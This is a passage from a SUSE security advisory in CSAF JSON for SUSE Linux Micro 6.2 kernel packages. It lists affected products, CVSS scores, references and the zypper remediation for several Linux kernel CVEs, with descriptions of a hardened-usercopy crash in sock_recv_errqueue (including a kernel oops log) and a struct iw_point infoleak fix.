"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22976",
"url": "https://www.suse.com/security/cve/CVE-2026-22976"
},
{
"category": "external",
"summary": "SUSE Bug 1257035 for CVE-2026-22976",
"url": "https://bugzilla.suse.com/1257035"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22976"
},
{
"cve": "CVE-2026-22977",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22977"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: sock: fix hardened usercopy panic in sock_recv_errqueue\n\nskbuff_fclone_cache was created without defining a usercopy region,\n[1] unlike skbuff_head_cache which properly whitelists the cb[] field.\n[2] This causes a usercopy BUG() when CONFIG_HARDENED_USERCOPY is\nenabled and the kernel attempts to copy sk_buff.cb data to userspace\nvia sock_recv_errqueue() -\u003e put_cmsg().\n\nThe crash occurs when: 1. TCP allocates an skb using alloc_skb_fclone()\n (from skbuff_fclone_cache) [1]\n2. The skb is cloned via skb_clone() using the pre-allocated fclone\n[3] 3. The cloned skb is queued to sk_error_queue for timestamp\nreporting 4. Userspace reads the error queue via recvmsg(MSG_ERRQUEUE)\n5. sock_recv_errqueue() calls put_cmsg() to copy serr-\u003eee from skb-\u003ecb\n[4] 6. __check_heap_object() fails because skbuff_fclone_cache has no\n usercopy whitelist [5]\n\nWhen cloned skbs allocated from skbuff_fclone_cache are used in the\nsocket error queue, accessing the sock_exterr_skb structure in skb-\u003ecb\nvia put_cmsg() triggers a usercopy hardening violation:\n\n[ 5.379589] usercopy: Kernel memory exposure attempt detected from SLUB object \u0027skbuff_fclone_cache\u0027 (offset 296, size 16)!\n[ 5.382796] kernel BUG at mm/usercopy.c:102!\n[ 5.383923] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\n[ 5.384903] CPU: 1 UID: 0 PID: 138 Comm: poc_put_cmsg Not tainted 6.12.57 #7\n[ 5.384903] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014\n[ 5.384903] RIP: 0010:usercopy_abort+0x6c/0x80\n[ 5.384903] Code: 1a 86 51 48 c7 c2 40 15 1a 86 41 52 48 c7 c7 c0 15 1a 86 48 0f 45 d6 48 c7 c6 80 15 1a 86 48 89 c1 49 0f 45 f3 e8 84 27 88 ff \u003c0f\u003e 0b 490\n[ 5.384903] RSP: 0018:ffffc900006f77a8 EFLAGS: 00010246\n[ 5.384903] RAX: 000000000000006f RBX: ffff88800f0ad2a8 RCX: 1ffffffff0f72e74\n[ 5.384903] RDX: 0000000000000000 RSI: 0000000000000004 RDI: ffffffff87b973a0\n[ 5.384903] RBP: 0000000000000010 R08: 0000000000000000 R09: fffffbfff0f72e74\n[ 5.384903] R10: 0000000000000003 R11: 79706f6372657375 R12: 0000000000000001\n[ 5.384903] R13: ffff88800f0ad2b8 R14: ffffea00003c2b40 R15: ffffea00003c2b00\n[ 5.384903] FS: 0000000011bc4380(0000) GS:ffff8880bf100000(0000) knlGS:0000000000000000\n[ 5.384903] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 5.384903] CR2: 000056aa3b8e5fe4 CR3: 000000000ea26004 CR4: 0000000000770ef0\n[ 5.384903] PKRU: 55555554\n[ 5.384903] Call Trace:\n[ 5.384903] \u003cTASK\u003e\n[ 5.384903] __check_heap_object+0x9a/0xd0\n[ 5.384903] __check_object_size+0x46c/0x690\n[ 5.384903] put_cmsg+0x129/0x5e0\n[ 5.384903] sock_recv_errqueue+0x22f/0x380\n[ 5.384903] tls_sw_recvmsg+0x7ed/0x1960\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? schedule+0x6d/0x270\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n[ 5.384903] ? mutex_unlock+0x81/0xd0\n[ 5.384903] ? __pfx_mutex_unlock+0x10/0x10\n[ 5.384903] ? __pfx_tls_sw_recvmsg+0x10/0x10\n[ 5.384903] ? _raw_spin_lock_irqsave+0x8f/0xf0\n[ 5.384903] ? _raw_read_unlock_irqrestore+0x20/0x40\n[ 5.384903] ? srso_alias_return_thunk+0x5/0xfbef5\n\nThe crash offset 296 corresponds to skb2-\u003ecb within skbuff_fclones:\n - sizeof(struct sk_buff) = 232 - offsetof(struct sk_buff, cb) = 40 -\n offset of skb2.cb in fclones = 232 + 40 = 272 - crash offset 296 =\n 272 + 24 (inside sock_exterr_skb.ee)\n\nThis patch uses a local stack variable as a bounce buffer to avoid the hardened usercopy check failure.\n\n[1] https://elixir.bootlin.com/linux/v6.12.62/source/net/ipv4/tcp.c#L885\n[2] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5104\n[3] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5566\n[4] https://elixir.bootlin.com/linux/v6.12.62/source/net/core/skbuff.c#L5491\n[5] https://elixir.bootlin.com/linux/v6.12.62/source/mm/slub.c#L5719",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22977",
"url": "https://www.suse.com/security/cve/CVE-2026-22977"
},
{
"category": "external",
"summary": "SUSE Bug 1257053 for CVE-2026-22977",
"url": "https://bugzilla.suse.com/1257053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22977"
},
{
"cve": "CVE-2026-22978",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22978"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: avoid kernel-infoleak from struct iw_point\n\nstruct iw_point has a 32bit hole on 64bit arches.\n\nstruct iw_point {\n void __user *pointer; /* Pointer to the data (in user space) */\n __u16 length; /* number of fields or size in bytes */\n __u16 flags; /* Optional params */\n};\n\nMake sure to zero the structure to avoid disclosing 32bits of kernel data\nto user space.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22978",
"url": "https://www.suse.com/security/cve/CVE-2026-22978"
},
{
"category": "external",
"summary": "SUSE Bug 1257227 for CVE-2026-22978",
"url": "https://bugzilla.suse.com/1257227"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22981",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22981"
}
],
"notes": [
{
"category": "general",
